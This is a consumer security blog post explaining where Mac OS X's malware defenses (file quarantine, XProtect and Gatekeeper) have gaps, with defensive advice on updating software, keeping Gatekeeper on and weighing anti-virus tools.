I spend a lot of time telling people about how their Mac protect them from malware. I have even written an entire section on the topic in my Mac Malware Guide. So it may be a bit surprising that I seem to be suddenly turning around and saying the opposite. That’s not the case, though. The Mac still protects you just as I have said… but it’s also important to keep in mind where the holes in those defenses are. Just as a house isn’t secure if the owner is unaware that the back door is unlocked, neither is a Mac safe if the owner isn’t aware of the holes in its security.
Before I start discussing these vulnerabilities, it’s important to understand the defenses. If you aren’t already familiar with them, I would refer you to my Mac Malware Guide – specifically, the section titled How does Mac OS X protect me?. Once you have read that and understood the defenses, we can discuss weaknesses.
The most notable weakness is a little-discussed issue with the entire file quarantine system in Mac OS X. This system works great on files that you download directly to the computer through an app like Safari or Mail. When you do so, the downloaded file is marked as being quarantined, and when opened, Mac OS X defenses like XProtect and Gatekeeper come into play.
However, there are ways of getting files past the quarantine system, and I’m not talking about sneaky hacker tricks. I’m talking about normal things. For example, copying a file from an external hard drive, flash drive, CD or DVD bypasses quarantine. If that file already has the quarantine flag set after being downloaded on another Mac, and is stored on media that respects Mac metadata, then great, but if not, it will not be quarantined. Care must therefore be taken with files on external drives or optical media whose sources aren’t known.
Similarly, the quarantine system relies on the app being used for downloading doing things properly. Not all do, and this can result in the quarantine flag not being set on downloaded files. Thus, it’s important to know whether or not a particular app properly supports file quarantine. You can assume any Apple app does, but when it comes to third-party apps, a simple test is necessary. Download an application that you are sure is safe, then test to see if you can open it. If you don’t see a warning that the application was downloaded from the internet, the application you used to download that file isn’t properly supporting quarantine, and should not be trusted.
It’s also worth pointing out that malware that comes onto the system through vulnerabilities in third-party software, such as Java, Adobe Flash Player or Microsoft Office, bypass quarantine entirely. The infamous Flashback malware, for example, used Java vulnerabilities to copy executable files into the system. Since this was done behind the scenes, out of view of quarantine, those executables were able to run without any user interactions whatsoever. Keeping third-party software updated, and limiting the “attack surface” by reducing or eliminating use of browser plug-ins like Java and Flash, is important for protecting against such attacks.
The next potential hole in the chain involves XProtect. Since XProtect is essentially just a basic anti-virus scanner, it has the same limitations as most such tools. Namely, if the malware in question hasn’t been seen by Apple and added to the XProtect definitions, XProtect won’t block it. Every time new malware appears, there is always a delay before it is added to XProtect. Sometimes that delay is very short, but other times it can be unacceptably long. For example, in the recent case of Icefog, Apple didn’t add the definition to XProtect until two weeks after they were alerted to the malware.
Unfortunately, there’s not much the user can do to solve this issue, beyond the difficult-to-quantify advice frequently given to exercise caution about what is downloaded, or possibly using another layer of security (like anti-virus software). It’s important to note that anti-virus software can sometimes protect the user sooner than XProtect, as was the case with Icefog, but not always.
Other security holes involve Gatekeeper. This is great technology, but it’s only as good as the user allows it to be. Some users disable it, either entirely or on a case-by-case basis, to run apps that don’t come from identified developers. That’s okay in some cases – I myself have some apps that I had to bypass Gatekeeper for – as long as you are positive the app is legit. However, careless bypassing can remove this layer of security entirely. Gatekeeper should be kept set at its default, medium-security setting, or the more secure App Store-only setting, to avoid such problems. Exceptions should be made, if at all, by control-clicking the application and choosing Open, rather than by disabling Gatekeeper entirely.
In addition, hackers have been known (in the cases of the KitM and Janicab trojans) to use throwaway developer IDs to sign their malware, thus bypassing Gatekeeper. This trick only works as long as the malware is not discovered by Apple, at which time they can revoke the developer ID and “kill” the app, but for tightly targeted malware, that could be a long time. There’s not much to be done about avoiding signed malware beyond (again) using some additional form of anti-virus software, which may or may not catch something that gets past XProtect and Gatekeeper.
So, what’s the takeaway message here? For the most part, as long as you’re aware of these issues and careful about what you open, you’ll be okay. However, that’s not a guarantee of safety. There are ways that malware could sneak in, using tricks that could sometimes fool reasonably savvy users, or newly-discovered vulnerabilities in the system or third-party software. Some users may benefit from the use of anti-virus software, as an additional layer of security, though that’s certainly far from a requirement. If you do decide to use anti-virus software, be sure to be aware that it may not protect you any better from a brand new threat that is capable of bypassing the security in Mac OS X.
If you do decide that you need anti-virus software, be sure to do your research. Many anti-virus programs aren’t much more than a Mac wrapper around a Windows-based app, and they don’t provide you a decent amount of protection against Mac threats. Others can protect you well, but may cause problems, like destabilizing your system. Don’t install anti-virus software lightly, be sure you know how to properly remove it if it causes problems, and remember that the most aggressively-marketed software is often not the best.
Tags: anti-virus, Gatekeeper, Mac OS X, quarantine, XProtect